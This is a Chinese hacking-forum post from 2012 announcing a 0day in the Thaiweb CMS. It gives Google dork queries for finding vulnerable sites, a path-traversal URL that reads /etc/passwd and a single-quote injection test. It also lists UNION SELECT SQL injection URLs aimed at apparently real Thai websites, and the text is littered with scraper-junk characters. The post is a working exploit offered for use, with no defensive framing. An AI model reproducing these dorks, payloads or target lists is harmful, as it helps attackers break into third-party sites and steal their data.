找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2117|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:
4 w. V7 j; ~) Q6 J
3 y: h+ g) c( Z9 V4 e4 }intext:powered by Thaiweb8 q) `. _4 M. [. Z
( ^% J: E7 W1 `' _2 M6 L; l
inurl:index.php?page=board.php
0 ^1 @6 b: ~/ {, M- {3 `% c3 L3 e- n/ d* d

( N4 _& g1 s0 {/ S+ h3 g, D+ z! x7 U! x8 y( Y5 H
利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd4 |# H/ U' B! `" f! F) L( E. \
3 e' W) k  n0 j" ~- ~8 B
+ B/ ^6 h+ z( T% O4 Q2 e5 t) f; j9 F

! N7 g2 h' `4 l( X' I利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'$ R4 _/ F9 k# p  B! X8 X2 O; D& Y

( _1 o( J1 @' m# r" q; g+ v/ F3 ~, O
1 A6 g2 H9 O- c- d; p9 z1 k9 O2 O. d3 X: U3 u
http://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--2 e2 S0 z5 Q5 [: K
0 H5 L3 u# `. C- `9 {  j( Z
http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
, B/ ]5 J  U7 _- N. ?+ r# |/ A0 A # `% f6 R6 ]0 v1 `. n$ w
http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
6 J* E2 }5 h5 {
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表